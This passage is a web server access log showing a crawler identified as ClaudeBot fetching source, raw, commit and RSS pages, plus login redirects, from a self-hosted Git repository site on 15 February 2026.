"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 216.73.216.188] [Length 11196] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13023] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14406] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10842] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Factivate" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14415] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 216.73.216.188] [Length 11223] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11059] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 9849] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 216.73.216.188] [Length 10867] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 216.73.216.188] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11065] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 216.73.216.188] [Length 11796] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10876] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Factivate.csh" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 216.73.216.188] [Length 20121] [Gzip 5.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip?display=source" [Client 216.73.216.188] [Length 11784] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2FDockerfile" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9789] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 11525] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 216.73.216.188] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 9850] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11479] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 11103] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/uvicorn" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/uvicorn" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 216.73.216.188] [Length 11211] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 